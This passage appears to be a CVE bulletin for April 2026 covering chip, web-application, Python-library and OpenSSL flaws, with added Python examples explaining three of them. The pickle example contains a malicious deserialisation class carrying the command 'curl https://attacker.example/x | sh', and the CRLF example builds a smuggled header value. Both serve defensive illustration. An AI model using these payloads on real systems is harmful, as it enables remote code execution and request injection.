    S RP-DATA messages. 2026-04-06 not yet calculated CVE-2025-54328 [ https://= www.cve.org/CVERecord?id=3DCVE-2025-54328 ] https://semiconductor.samsung.c= om/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54328/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor amd Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480=
    , 1580, W920, W930, and W1000. Improper synchronization on a global variabl=
    e leads to a double free. An attacker can trigger a race condition by invok= ing an ioctl function concurrently from multiple threads. 2026-04-06 not ye=
    t calculated CVE-2025-54601 [ https://www.cve.org/CVERecord?id=3DCVE-2025-5= 4601 ] https://semiconductor.samsung.com/support/quality-support/product-se= curity-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54601/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480=
    , 1580, W920, W930, and W1000. Improper synchronization on a global variabl=
    e leads to a use-after-free. An attacker can trigger a race condition by in= voking an ioctl function concurrently from multiple threads. 2026-04-06 not=
    yet calculated CVE-2025-54602 [ https://www.cve.org/CVERecord?id=3DCVE-202= 5-54602 ] https://semiconductor.samsung.com/support/quality-support/product= -security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54602/
    =C2=A0 n/a--GenieACS In GenieACS 1.2.13, an unauthenticated access vulnerab= ility exists in the NBI API endpoint. 2026-04-07 not yet calculated CVE-202= 5-56015 [ https://www.cve.org/CVERecord?id=3DCVE-2025-56015 ] https://githu= b.com/genieacs/genieacs/
    https://github.com/e1st/CVE-2025-56015
    =C2=A0 Apache Software Foundation--Apache Airflow When user logged out, the=
    JWT token the user had authtenticated with was not invalidated, which coul=
    d lead to reuse of that token in case it was intercepted. In Airflow 3.2 we=
    implemented the mechanism that implements token invalidation at logout. Us= ers who are concerned about the logout scenario and possibility of intercep= ting the tokens, should upgrade to Airflow 3.2+ Users are recommended to up= grade to version 3.2.0, which fixes this issue. 2026-04-09 not yet calculat=
    ed CVE-2025-57735 [ https://www.cve.org/CVERecord?id=3DCVE-2025-57735 ] htt= ps://github.com/apache/airflow/pull/61339 https://github.com/apache/airflow/pull/56633 https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in Samsung Mobile Processor, Wearable Pro= cessor, and Modem (Exynos 980, 850, 990, 1080, 2100, 1280, 2200, 1330, 1380=
    , 1480, 2400, 1580, 2500, 1680, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, Modem 5400, and Modem 5410). The absence of proper input validation l= eads to a Denial of Service. 2026-04-06 not yet calculated CVE-2025-57834 [=
    https://www.cve.org/CVERecord?id=3DCVE-2025-57834 ] https://semiconductor.= samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54328/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in RRC in Samsung Mobile Processor, Weara= ble Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330=
    , 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, and Modem 5400. Improper memory initialization results in an illegal = memory access, causing a system crash via a malformed RRCReconfiguration me= ssage. 2026-04-06 not yet calculated CVE-2025-57835 [ https://www.cve.org/C= VERecord?id=3DCVE-2025-57835 ] https://semiconductor.samsung.com/support/qu= ality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-57835/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in L2 in Samsung Mobile Processor, Wearab=
    le Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330,=
    1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5= 300, and Modem 5400. Incorrect handling of LTE MAC packets containing many = MAC Control Elements (CEs) leads to baseband crashes. 2026-04-06 not yet ca= lculated CVE-2025-58349 [ https://www.cve.org/CVERecord?id=3DCVE-2025-58349=
    ] https://semiconductor.samsung.com/support/quality-support/product-securi= ty-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-58349/
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in USIM in Samsung Mobile Processor, Wear= able Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 133=
    0, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem=
    5300, and Modem 5400. Improper handling of SIM card proactive commands lea=
    ds to a Denial of Service. 2026-04-06 not yet calculated CVE-2025-59440 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2025-59440 ] https://semiconductor.sa= msung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-59440/
    =C2=A0 n/a--n/a An open redirect in Ascertia SigningHub User v10.0 allows a= ttackers to redirect users to a malicious site via a crafted URL. 2026-04-0=
    6 not yet calculated CVE-2025-61166 [ https://www.cve.org/CVERecord?id=3DCV= E-2025-61166 ] https://linkedin.com/in/thakur-nikhil https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166= -bf5d708cd241
    =C2=A0 Apache Software Foundation--Apache DolphinScheduler An Exposure of S= ensitive Information to an Unauthorized Actor vulnerability exists in Apach=
    e DolphinScheduler. This vulnerability may allow unauthorized actors to acc= ess sensitive information, including database credentials. This issue affec=
    ts Apache DolphinScheduler versions 3.1.*. Users are recommended to upgrade=
    to: * version =E2=89=A5 3.2.0 if using 3.1.x As a temporary workaround, us= ers who cannot upgrade immediately may restrict the exposed management endp= oints by setting the following environment variable: ``` MANAGEMENT_ENDPOIN= TS_WEB_EXPOSURE_INCLUDE=3Dhealth,metrics,prometheus ``` Alternatively, add = the following configuration to the application.yaml file: ``` management: = =C2=A0 =C2=A0endpoints: =C2=A0 =C2=A0 =C2=A0web: =C2=A0 =C2=A0 =C2=A0 =C2=
    =A0 exposure: =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 include: health,metrics,pr= ometheus ``` This issue has been reported as CVE-2023-48796: https://cvepro= cess.apache.org/cve5/CVE-2023-48796 2026-04-09 not yet calculated CVE-2025-= 62188 [ https://www.cve.org/CVERecord?id=3DCVE-2025-62188 ] https://lists.a= pache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo https://www.cve.org/CVERecord?id=3DCVE-2023-48796
    =C2=A0 axios--axios Axios is a promise based HTTP client for the browser an=
    d Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normal= ization when checking NO_PROXY rules. Requests to loopback addresses like l= ocalhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY match= ing and go through the configured proxy. This goes against what developers = expect and lets attackers force requests through a proxy, even if NO_PROXY =
    is set up to protect loopback or internal services. This issue leads to the=
    possibility of proxy bypass and SSRF vulnerabilities allowing attackers to=
    reach sensitive loopback or internal services despite the configured prote= ctions. This vulnerability is fixed in 1.15.0. 2026-04-09 not yet calculate=
    d CVE-2025-62718 [ https://www.cve.org/CVERecord?id=3DCVE-2025-62718 ] http= s://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5 https://github.com/axios/axios/pull/10661 https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f2= 4df
    https://datatracker.ietf.org/doc/html/rfc1034#section-3.1 https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2 https://github.com/axios/axios/releases/tag/v1.15.0
    =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
    or Exynos An issue was discovered in Samsung Mobile Processor, Wearable Pro= cessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380,=
    1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, a=
    nd Modem 5400. An out-of-bounds write occurs due to a mismatch between the = TP-UDHI and UDL values when processing an SMS TP-UD packet. 2026-04-07 not = yet calculated CVE-2025-62818 [ https://www.cve.org/CVERecord?id=3DCVE-2025= -62818 ] https://semiconductor.samsung.com/support/quality-support/product-= security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-62818/
    =C2=A0 n/a--LimeSurvey A Reflected Cross-Site Scripting (XSS) affects LimeS= urvey versions prior to 6.15.11+250909, due to the lack of validation of gi=
    d parameter in getInstance() function in application/models/QuestionCreate.= php. This allows an attacker to craft a malicious URL and compromise the lo= gged in user. 2026-04-09 not yet calculated CVE-2025-63238 [ https://www.cv= e.org/CVERecord?id=3DCVE-2025-63238 ] https://github.com/LimeSurvey/LimeSur= vey/commit/80769a677dc82ddb1fcced4af19bd959d583208d https://gist.github.com/masquerad3r/f913ab479e8de2ad71987ef98a088fb5
    =C2=A0 n/a--n/a An issue in JXL 9 Inch Car Android Double Din Player Androi=
    d v12.0 allows attackers to force the infotainment system into accepting fa= lsified GPS signals as legitimate, resulting in the device reporting an inc= orrect or static location. 2026-04-07 not yet calculated CVE-2025-69515 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2025-69515 ] http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main= /README.md
    =C2=A0 n/a--n/a An issue was discovered in Kiamo before 8.4 allowing authen= ticated administrative attackers to execute arbitrary PHP code on the serve=
    r. 2026-04-09 not yet calculated CVE-2025-70364 [ https://www.cve.org/CVERe= cord?id=3DCVE-2025-70364 ] http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/20= 25-12-23-CVE-2025-70364-Kiamo.md
    =C2=A0 Kiamo[.]com -- Kiamo A stored cross-site scripting (XSS) vulnerabili=
    ty exists in Kiamo before 8.4 due to improper output encoding of user-suppl= ied input in administrative interfaces. An authenticated administrative use=
    r can inject arbitrary JavaScript code that is executed in the browser of u= sers viewing the affected pages. 2026-04-09 not yet calculated CVE-2025-703=
    65 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70365 ] http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/20= 25-12-23-CVE-2025-70365-Kiamo.md
    =C2=A0 n/a-- Limesurvey Cross Site Scripting vulnerability in Limesurvey v.= 6.15.20+251021 allows a remote attacker to execute arbitrary code via the B= ox[title] and box[url] parameters. 2026-04-09 not yet calculated CVE-2025-7= 0797 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70797 ] https://gist.git= hub.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d https://github.com/LimeSurvey/LimeSurvey/pull/4356
    =C2=A0 n/a--n/a Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3= .3.15 allows a local attacker to execute arbitrary code via the login funct= ion and the authentication mechanism 2026-04-09 not yet calculated CVE-2025= -70810 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70810 ] https://github= .com/ariefibis
    https://www.linkedin.com/in/mohammed-a-6a2548112/ https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30
    =C2=A0 n/a--n/a Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3= .3.15 allows a local attacker to execute arbitrary code via the Admin Contr=
    ol Panel icon management functionality. 2026-04-09 not yet calculated CVE-2= 025-70811 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70811 ] https://git= hub.com/ariefibis
    https://www.linkedin.com/in/mohammed-a-6a2548112/ https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822 =C2=A0 n/a--Yaffa=C2=A0 yaffa v2.0.0 is vulnerable to Cross Site Scripting = (XSS). An attacker can inject malicious JavaScript into the "Add Account Gr= oup" function on the account-group page, allowing execution of arbitrary sc= ript in the context of users who view the affected page. 2026-04-07 not yet=
    calculated CVE-2025-70844 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70= 844 ] https://github.com/kantorge/yaffa https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844 =C2=A0 n/a--n/a Dual DHCP DNS Server 8.01 improperly accepts and caches UDP=
    DNS responses without validating that the response originates from a legit= imate configured upstream DNS server. The implementation matches responses = primarily by TXID and inserts results into the cache, enabling a remote att= acker to inject forged responses and poison the DNS cache, potentially redi= recting victims to attacker-controlled destinations. 2026-04-07 not yet cal= culated CVE-2025-71058 [ https://www.cve.org/CVERecord?id=3DCVE-2025-71058 =
    ] https://sourceforge.net/projects/dhcp-dns-server/ https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058
    =C2=A0 Google--Android In onHeaderDecoded of LocalImageResolver.java, there=
    is a possible persistent denial of service due to resource exhaustion. Thi=
    s could lead to local denial of service with no additional execution privil= eges needed. User interaction is not needed for exploitation. 2026-04-06 no=
    t yet calculated CVE-2026-0049 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-0049 ] https://source.android.com/docs/security/bulletin/2026/2026-04-01 =C2=A0 Pegasystems--Pega Robot Studio An arbitrary file-write vulnerability=
    in Pega Browser Extension (PBE) affects Pega Robotic Automation version 22=
    .1 or R25 users who are running automations that work with Google Chrome or=
    Microsoft Edge. A bad actor could create a website that includes malicious=
    code. The vulnerability could occur if a Robot Runtime user navigates to t=
    he malicious website. 2026-04-07 not yet calculated CVE-2026-1078 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2026-1078 ] https://support.pega.com/suppor= t-doc/pega-security-advisory-a26-vulnerability-remediation-note
    =C2=A0 Pegasystems--Pega Browser Extension (PBE) A native messaging host vu= lnerability in Pega Browser Extension (PBE) affects users of all versions o=
    f Pega Robotic Automation who have installed Pega Browser Extension. A bad = actor could create a website that contains malicious code that targets PBE.=
    The vulnerability could occur if a user navigates to this website. The mal= icious website could then present an unexpected message box. 2026-04-07 not=
    yet calculated CVE-2026-1079 [ https://www.cve.org/CVERecord?id=3DCVE-2026= -1079 ] https://support.pega.com/support-doc/pega-security-advisory-a26-vul= nerability-remediation-note
    =C2=A0 parisneo--parisneo/lollms In parisneo/lollms version 2.1.0, the appl= ication's session management is vulnerable to improper access control due t=
    o the use of a weak secret key for signing JSON Web Tokens (JWT). This vuln= erability allows an attacker to perform an offline brute-force attack to re= cover the secret key. Once the secret key is obtained, the attacker can for=
    ge administrative tokens by modifying the JWT payload and resigning it with=
    the cracked secret. This enables unauthorized users to escalate privileges=
    , impersonate the administrator, and gain access to restricted endpoints. T=
    he issue is resolved in version 2.2.0. 2026-04-07 not yet calculated CVE-20= 26-1114 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1114 ] https://huntr.= com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89 https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad= 55fed34
    =C2=A0 parisneo--parisneo/lollms A Stored Cross-Site Scripting (XSS) vulner= ability was identified in the social feature of parisneo/lollms, affecting = the latest version prior to 2.2.0. The vulnerability exists in the `create_= post` function within `backend/routers/social/__init__.py`, where user-prov= ided content is directly assigned to the `DBPost` model without sanitizatio=
    n. This allows attackers to inject and store malicious JavaScript, which is=
    executed in the browsers of users viewing the Home Feed, including adminis= trators. This can lead to account takeover, session hijacking, and wormable=
    attacks. The issue is resolved in version 2.2.0. 2026-04-10 not yet calcul= ated CVE-2026-1115 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1115 ] htt= ps://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead6= 9b8292a
    =C2=A0 parisneo--parisneo/lollms A Cross-site Scripting (XSS) vulnerability=
    was identified in the `from_dict` method of the `AppLollmsMessage` class i=
    n parisneo/lollms prior to version 2.2.0. The vulnerability arises from the=
    lack of sanitization or HTML encoding of the `content` field when deserial= izing user-provided data. This allows an attacker to inject malicious HTML =
    or JavaScript payloads, which can be executed in the context of another use= r's browser. Exploitation of this vulnerability can lead to account takeove=
    r, session hijacking, or wormable attacks. 2026-04-12 not yet calculated CV= E-2026-1116 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1116 ] https://hu= ntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead6= 9b8292a
parisneo--parisneo/lollms: An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject requests after a period of inactivity and the excessively long default session duration of 31 days. The vulnerability enables an attacker to maintain persistent access to a compromised account, even after the victim resets their password.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-1163 [ https://www.cve.org/CVERecord?id=CVE-2026-1163 ]
Source: https://huntr.com/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b

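The advisory above names three missing controls: sessions survive a password reset, there is no inactivity timeout, and the absolute lifetime is 31 days. The block below is an added example, not lollms code: `SessionStore` is a hypothetical in-memory store whose `validate_legacy` applies only the 31-day cap and whose `validate` adds a credential version check, an idle timeout and an absolute lifetime. The 30-minute and 12-hour limits are assumptions chosen for the example; time is passed in explicitly so the behaviour is deterministic.

```python
"""Session lifetime handling around a password reset (CVE-2026-1163 pattern).

Added example; not code from parisneo/lollms. SessionStore is a hypothetical
in-memory store; the idle and absolute limits are assumptions chosen for the
example (the advisory only says the default lifetime of 31 days is too long).
Time is passed in explicitly so the behaviour is deterministic.
"""
import secrets
from dataclasses import dataclass

IDLE_TIMEOUT = 30 * 60            # assumption: 30 minutes without a request ends the session
ABSOLUTE_LIFETIME = 12 * 3600     # assumption: 12 hours, regardless of activity
LEGACY_LIFETIME = 31 * 24 * 3600  # the 31-day default named in the advisory


@dataclass
class User:
    name: str
    password_hash: str
    credential_version: int = 0   # incremented on every password change


@dataclass
class Session:
    user: str
    credential_version: int       # version that was current at login
    created_at: float
    last_seen: float


class SessionStore:
    def __init__(self):
        self.users = {}
        self.sessions = {}

    def add_user(self, name, password_hash):
        self.users[name] = User(name, password_hash)

    def login(self, name, now):
        user = self.users[name]
        token = secrets.token_urlsafe(32)
        self.sessions[token] = Session(name, user.credential_version, now, now)
        return token

    def reset_password(self, name, new_hash):
        """Bumping the version invalidates every session minted before the reset,
        including ones an attacker already holds; the next validate() revokes them."""
        user = self.users[name]
        user.password_hash = new_hash
        user.credential_version += 1

    def validate_legacy(self, token, now):
        """The vulnerable policy: only an absolute 31-day cap, no reset or idle check."""
        s = self.sessions.get(token)
        if s is None or now - s.created_at > LEGACY_LIFETIME:
            return None
        return s.user

    def validate(self, token, now):
        """Fixed policy: credential version, idle timeout and absolute lifetime."""
        s = self.sessions.get(token)
        if s is None:
            return None
        stale = (
            s.credential_version != self.users[s.user].credential_version
            or now - s.last_seen > IDLE_TIMEOUT
            or now - s.created_at > ABSOLUTE_LIFETIME
        )
        if stale:
            del self.sessions[token]   # revoke so the token cannot be replayed later
            return None
        s.last_seen = now
        return s.user
```

Deleting the user's sessions eagerly inside `reset_password` is equally valid; the version check additionally covers tokens held in caches or replicas that the eager delete might miss.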
Python Software Foundation--CPython: CR/LF bytes were not rejected in the HTTP client's proxy tunnel headers or tunnel host. A CR or LF in such a value terminates the current line of the request sent to the proxy, so an attacker-controlled value can inject further header lines into it.
Published: 2026-04-10. CVSS: not yet calculated. CVE-2026-1502 [ https://www.cve.org/CVERecord?id=CVE-2026-1502 ]
Source: https://github.com/python/cpython/pull/146212 https://github.com/python/cpython/issues/146211 https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/ https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69

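The CPython entry above is a header-injection bug: the tunnel host and tunnel headers go into the CONNECT request verbatim. The block below is an added example, not CPython's `http.client` code: `build_connect_request` builds the CONNECT request the way a client sends it to a proxy, with a validation step that can be switched off to show what the missing check permits. `EVIL_HOST` is a constructed input, and the control-character policy (reject anything below 0x20 and 0x7f) is this example's own, stricter than the obsolete line folding HTTP once allowed.

```python
"""CR/LF injection into an HTTP proxy CONNECT request (CVE-2026-1502 pattern).

Added example; not CPython's http.client code. build_connect_request builds the
CONNECT request the way a client would send it to a proxy, with validation that
can be switched off to show the effect of the missing check. EVIL_HOST is a
constructed input; the control-character policy (reject anything below 0x20
and 0x7f) is this example's own.
"""
import re

_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

# Constructed attacker-controlled tunnel host: the CRLF ends the request line
# and the remainder is parsed by the proxy as additional header lines.
EVIL_HOST = "legit.example:443\r\nX-Injected: yes\r\nX-Pad:"


def _check_field(label: str, value: str) -> str:
    if _CONTROL_CHARS.search(value):
        raise ValueError(f"{label} contains a control character: {value!r}")
    return value


def build_connect_request(tunnel_host: str, tunnel_port: int, headers=None, validate=True) -> bytes:
    """Return the raw CONNECT request a client sends to an HTTP proxy."""
    headers = dict(headers or {})
    if validate:
        _check_field("tunnel host", tunnel_host)
        for name, value in headers.items():
            _check_field("header name", name)
            _check_field("header value", value)
    lines = [
        f"CONNECT {tunnel_host}:{tunnel_port} HTTP/1.1",
        f"Host: {tunnel_host}:{tunnel_port}",
    ]
    lines.extend(f"{name}: {value}" for name, value in headers.items())
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_header_lines(raw: bytes):
    """Split a request the way a proxy sees it: one element per CRLF-terminated line."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return head.split(b"\r\n")


def is_injected(raw: bytes, header_name: bytes) -> bool:
    """Does a header the caller never set appear in the request the proxy would parse?"""
    needle = header_name.lower() + b":"
    return any(line.lower().startswith(needle) for line in parse_header_lines(raw))
```

With validation off, the proxy receives `X-Injected: yes` as a genuine header line twice (once from the request line, once from the `Host` line); with validation on, the request is never built.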
huggingface--huggingface/transformers: A vulnerability in the Hugging Face Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-1839 [ https://www.cve.org/CVERecord?id=CVE-2026-1839 ]
Source: https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485 https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396

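A `.pth` checkpoint is a pickle stream, so the entry above is a deserialisation bug: unpickling runs whatever callable the attacker named in `__reduce__`, before any model weight is touched. The block below is an added example, not Transformers or PyTorch code: it uses the stdlib `pickle` module to show the mechanism offline, `side_effect()` stands in for `os.system` so nothing harmful runs, and `RestrictedUnpickler` with its own minimal `SAFE_GLOBALS` allowlist approximates what `weights_only=True` does.

```python
"""Why torch.load() without weights_only=True is code execution (CVE-2026-1839 pattern).

Added example; not Transformers or PyTorch code. A .pth checkpoint is a pickle
stream, so the stdlib pickle module is enough to show the problem offline:
unpickling runs whatever callable the attacker named in __reduce__. The
RestrictedUnpickler approximates the allowlisting that weights_only=True
performs. side_effect() stands in for os.system so nothing harmful runs here;
SAFE_GLOBALS is this example's own, minimal allowlist.
"""
import io
import pickle

EXECUTED = []   # records calls made during unpickling


def side_effect(command: str) -> int:
    """Stand-in for os.system(): a real payload would run `command`."""
    EXECUTED.append(command)
    return 0


class MaliciousRngState:
    """Object an attacker would store in rng_state.pth."""

    def __reduce__(self):
        # Unpickling evaluates side_effect("...") and uses the return value.
        return (side_effect, ("curl https://attacker.example/x | sh",))


def build_malicious_checkpoint() -> bytes:
    return pickle.dumps({"python": MaliciousRngState(), "numpy": [1, 2, 3]}, protocol=2)


def build_benign_checkpoint() -> bytes:
    return pickle.dumps({"seed": 42, "numpy": [1, 2, 3]}, protocol=2)


# Globals a plain RNG checkpoint may legitimately reference. Anything else is refused.
SAFE_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "int"), ("builtins", "bytes"), ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def load_rng_state(blob: bytes, weights_only: bool = True):
    """Models the torch.load() call site: weights_only=False is the vulnerable path."""
    if weights_only:
        return RestrictedUnpickler(io.BytesIO(blob)).load()
    return pickle.loads(blob)


def probe(blob: bytes, weights_only: bool) -> str:
    """Returns 'loaded' or 'rejected' and leaves EXECUTED showing what ran."""
    EXECUTED.clear()
    try:
        load_rng_state(blob, weights_only=weights_only)
    except pickle.UnpicklingError:
        return "rejected"
    return "loaded"
```

The restricted loader fails at the GLOBAL opcode, before the REDUCE that would call the attacker's function, which is why `EXECUTED` stays empty on the rejected path. On PyTorch 2.6 and later `weights_only=True` is the default; on older versions it must be passed explicitly, which is the fix the advisory describes.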
Unknown--Link Whisper Free: The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-1900 [ https://www.cve.org/CVERecord?id=CVE-2026-1900 ]
Source: https://wpscan.com/vulnerability/dc10b627-7981-4c53-bc9d-e87418f3fcfc/

MediaTek, Inc.--MediaTek chipset: In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-20431 [ https://www.cve.org/CVERecord?id=CVE-2026-20431 ]
Source: https://corp.mediatek.com/product-security-bulletin/April-2026

MediaTek, Inc.--MediaTek chipset: In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-20432 [ https://www.cve.org/CVERecord?id=CVE-2026-20432 ]
Source: https://corp.mediatek.com/product-security-bulletin/April-2026

MediaTek, Inc.--MediaTek chipset: In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-20433 [ https://www.cve.org/CVERecord?id=CVE-2026-20433 ]
Source: https://corp.mediatek.com/product-security-bulletin/April-2026

MediaTek, Inc.--MediaTek chipset: In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-20446 [ https://www.cve.org/CVERecord?id=CVE-2026-20446 ]
Source: https://corp.mediatek.com/product-security-bulletin/April-2026

Rocket.Chat--Rocket.Chat: An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 allows users to be redirected to arbitrary URLs by manipulating parameters within a SAML endpoint.
Published: 2026-04-10. CVSS: not yet calculated. CVE-2026-22560 [ https://www.cve.org/CVERecord?id=CVE-2026-22560 ]
Source: https://hackerone.com/reports/3418031 https://github.com/RocketChat/Rocket.Chat/pull/38994

The Wikimedia Foundation--Mediawiki - Wikilove Extension: Improper neutralization of alternate XSS syntax vulnerability in The Wikimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS). The issue has been remediated on the `master` branch, and in the release branches for MediaWiki versions 1.43, 1.44, and 1.45.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-22711 [ https://www.cve.org/CVERecord?id=CVE-2026-22711 ]
Source: https://phabricator.wikimedia.org/T416502 https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3

OpenPLC_V3--OpenPLC_V3: OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Insecure Default vulnerability which could allow an attacker to gain access to the system by bypassing authentication via an API.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-28205 [ https://www.cve.org/CVERecord?id=CVE-2026-28205 ]
Source: https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10

OpenSSL--OpenSSL: Issue summary: Applications using AES-CFB128 encryption or decryption on systems with AVX-512 and VAES support can trigger an out-of-bounds read of up to 15 bytes when processing partial cipher blocks. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not written to output. The vulnerable code path is only reached when processing partial blocks (when a previous call left an incomplete block and the current call provides fewer bytes than needed to complete it). Additionally, the input buffer must be positioned at a page boundary with the following page unmapped. CFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead. For these reasons the issue was assessed as Low severity according to our Security Policy. Only x86-64 systems with AVX-512 and VAES instruction support are affected. Other architectures and systems without VAES support use different code paths that are not 